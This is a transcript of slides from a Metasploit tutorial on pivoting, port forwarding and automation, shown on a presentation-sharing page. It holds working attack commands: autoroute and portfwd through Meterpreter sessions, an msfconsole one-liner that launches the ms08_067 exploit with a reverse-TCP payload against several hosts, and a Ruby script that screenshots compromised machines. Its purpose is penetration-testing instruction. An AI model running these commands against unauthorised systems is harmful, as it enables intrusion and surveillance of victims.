Presentation is loading. Please wait.

Presentation is loading. Please wait.

Metasploit Framework (MSF) Fundamentals

Published byNicholas Hancock Modified over 6 years ago

Similar presentations

Presentation on theme: "Metasploit Framework (MSF) Fundamentals"— Presentation transcript:

1 Metasploit Framework (MSF) Fundamentals
Part 3 of 3: Pivoting and Automation Module Type: Basic Method Module Number: 0x04 Last Updated: Author: Hermit

2 Topics Common Terminology Quick Review Pivoting Port Forwarding
Automation

3 Common Terminology Vulnerability Exploit (‘sploit) Types
A method of interaction which allows for an unintended action to occur in response to an unexpected, invalid, or otherwise unaccounted for input of some form. Exploit (‘sploit) A piece of code that is designed to exploit a vulnerability to allow for an unintended action. Types There are three key module types in Metasploit: exploit modules, post-exploit modules, and auxiliary modules. Exploit modules take advantage of vulnerabities to gain an initial foothold on the system. Post-exploit modules collect information, escalate privileges, or otherwise expand upon the foothold achieved through an exploit module. Auxiliary modules perform functions unrelated to exploitation.

4 Common Terminology (continued)
Meterpreter A Swiss army knife payload that allows for modular enhancement, routing, secondary exploitation, and control. A solid first-choice. Session An open connection to a remote system through which commands, modules, or network traffic may be directed or routed. Pivoting Using one system to bridge between two networks, typically to move into a more privileged or restricted area.

5 Quick Review Selecting vulnerabilities Selecting payloads
Loading post-exploitation modules

6 Pivoting Compromise a target system via the exploit of your choice and a Meterpreter payload In the Meterpreter shell, determine what networks are available: meterpreter > ipconfig /all Ethernet adapter Local Area Connection: Physical Address : IP Address : Subnet Mask : Ethernet adapter Local Area Connection 2: Physical Address : IP Address : Subnet Mask :

7 Pivoting (continued) In the Meterpreter shell, run autoroute to establish a route to the new network: meterpreter > run autoroute -s /24 [*] Adding a route to / [+] Added route to / via [*] Use the -p option to list all active routes Verify the route has been added: meterpreter > run autoroute -p Active Routing Table ==================== Subnet Netmask Gateway Session 1 Background the session meterpreter > background

8 Pivoting (continued) Now just run commands like you normally would, but targeting the new network, and it will automatically route through this connection.

9 Port Forwarding Let’s say there is a target service on a second level network (one that you can only reach in Metasploit by using routing through a Meterpreter session) that you want to exploit, but the tool to do so isn’t available in Metasploit and you don’t have the time, effort, or expertise to do so. Metasploit provides an easy way to handle this through port forwarding… in essence the remote port gets mapped to a local port accessible by your operating system, and any tool can then use this to directly connect.

10 Port Forwarding (cont.)
To begin, compromise a remote target and establish routing to make Metasploit aware of the path. We’ll assume that our machine is and the remove target is (from a dual- homed system at and which has been compromised with Meterpreter running, not that this makes a lot of difference). run autoroute -s /24 Next, use the portfwd command to add the forwarding port (-l is the local port to use, -p is the remote port, and -r is the remote system): portfwd add -l p 80 -r

11 Port Forwarding (cont.)
Now port 4480 on your local machine is acting as a forward to port 80 on For instance, you could directly connect to that remote system on port 80 using netcat in a regular (non-Metasploit) shell: netcast localhost 4480

12 Automation All of the work you’ve gone through to this point has prepared you for what comes next… automating these attacks. Let’s assume that you have one exploit that you want to try on every host you get back from a scan (perhaps you’re targeting a corporate environment in a penetration test and they use a common build). You now know how to do this via the MSF Console, but it’s much more efficient to let this stuff run automatically in the background.

13 Automation For the sake of this demonstration, we’ll assume that you want to use the MS exploit we’ve used for the examples so far. To review, in the MSF Console you would issue the following commands (responses excluded for brevity): msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST msf exploit(ms08_067_netapi) > set LPORT msf exploit(ms08_067_netapi) > exploit

14 Automation If we run that on multiple hosts, we really only need to update the target host each time… a perfect candidate for automation! We will use the “-x” option to pass a series of commands to the MSF Console on startup (note that the following is all one line, run from a root shell in a terminal session): msfconsole -x “use exploit/windows/smb/ms08_067_netapi; set payload windows/meterpreter/reverse_tcp; set LHOST ; set LPORT 54321; set RHOST ; exploit; set RHOST ; exploit; set RHOST ; exploit; exit” Each command will be run as if you typed it into the MSF console manually.

15 Automation Of course, in this case you’d have to manually work each session yourself. What if you wanted to automatically take an action each time and close the session instead? Or what if you just want to collect backgrounded sessions for future efforts? This is where a custom resource file comes into play!

16 Automation Custom resource files can be simple text files with commands (such as the command line pass we just did), but they can also be Ruby code. We’ll use a variation of the demonstraton code the HD Moore released when Metasploit added Ruby support to demonstrate each of these use cases.

17 Automation (Ruby Resource)
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT set LHOST set ExitOnSession false <ruby> sleep(1) print_status("Waiting on an incoming sessions...") while (true) framework.sessions.each_pair do |sid,s| thost = s.session_host # Ensure that stdapi has been loaded before running if s.ext.aliases['stdapi'] print_status("Screenshotting session #{sid} #{thost}...") s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85") print_status("Closing session #{sid} #{thost}...") s.kill else print_status("Session #{sid} #{thost} active, but not yet configured") end end print_status("All done") </ruby>

18 Automation So what does that code do?
It loads a generic handler for exploits (something that all Meterpreters can connect to) It prints out the status of incoming connections It ensures that the STDAPI module is loaded It captures a screenshot from the system It closes the session

19 Automation To load it we just run the MSF Console with the option to process a particular resource file (this file, which we’ll call “autoscreen.rc”): msfconsole -r ~/autoscreen.rc Now when the MSF Console loads this will automatically begin and process sessions.

20 Automation … but how do we automate this?
First, fire up msfd to get a persistent Metasploit instance (the -q suppresses the banner, and the -p specifies the port): msfd -q -p [*] Initializing msfd… [*] Running msfd… Now, remove the lines for the payload from the previous resource file and let’s source that in the msfd session. This window will be our status monitor: echo “resource /path/to/resource.file” | netcat localhost [*] Processing /path/to/resource.file for ERB directives [*] resource (/path/to/resource.file)> Ruby Code (576 bytes) [*] Waiting on incoming sessions...

21 Automation Now in another window we can loop through (in whatever manner we’d like) our targets by piping command sequences into netcat, using the -n and -e switches, e.g.: echo -n -e “use exploit/windows/smb/ms08_067_netapi\nset payload windows/meterpreter/reverse_tcp\nset LHOST \nset LPORT 54321\nset RHOST $IPADDRESS\nexploit\nexit” Voila! Quick looping and processing of targets!

22 Questions?

23 Additional Resources Metasploit Unleased:
Sample Metasploit Ruby Resource File: Metasploit: The Penetration Tester’s Guide Metasploit Social Media (Official account) (James Lee, lead exploit developer/coder for MSF) (Josh Drake, former exploit developer for MSF) Hermit

Download ppt "Metasploit Framework (MSF) Fundamentals"

Similar presentations

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Armitage and Metasploit Penetration Testing Lab

Armitage and Metasploit Penetration Testing Lab
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.

1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.

© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
METASPLOIT.

METASPLOIT.
Chapter 5 IP Routing Routing Sending packets through network from one device to another What must routers know? – Destination address – Neighboring routers.

Chapter 5 IP Routing Routing Sending packets through network from one device to another What must routers know? – Destination address – Neighboring routers.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
Forensic Artifacts From A Pass The Hash (PtH) Attack

Forensic Artifacts From A Pass The Hash (PtH) Attack
11 NETWORK PROTOCOLS AND SERVICES Chapter 10. Chapter 10: Network Protocols and Services2 NETWORK PROTOCOLS AND SERVICES  Identify how computers on TCP/IP.

11 NETWORK PROTOCOLS AND SERVICES Chapter 10. Chapter 10: Network Protocols and Services2 NETWORK PROTOCOLS AND SERVICES  Identify how computers on TCP/IP.
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.

EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
SECURITY ZONES. Security Zones  A security zone is a logical grouping of resources, such as systems, networks, or processes, that are similar in the.

SECURITY ZONES. Security Zones  A security zone is a logical grouping of resources, such as systems, networks, or processes, that are similar in the.
1 Chapter Overview Routing Principles Building Routing Tables.

1 Chapter Overview Routing Principles Building Routing Tables.
MIS 5212.001 Week 1 Site:

MIS Week 1 Site:
Penetration Testing 101 (Boot-camp)

Penetration Testing 101 (Boot-camp)
Routing Basics Chapter 8. powered by DJ 1. C HAPTER O BJECTIVES At the end of this Chapter you will be able to:  Understand routing basics. powered by.

Routing Basics Chapter 8. powered by DJ 1. C HAPTER O BJECTIVES At the end of this Chapter you will be able to:  Understand routing basics. powered by.
Pivoting UTD Computer Security Group Scott Hand 10 October 2012.

Pivoting UTD Computer Security Group Scott Hand 10 October 2012.
MIS 5212.001 Week 1 Site:

MIS Week 1 Site:

Similar presentations

Ads by Google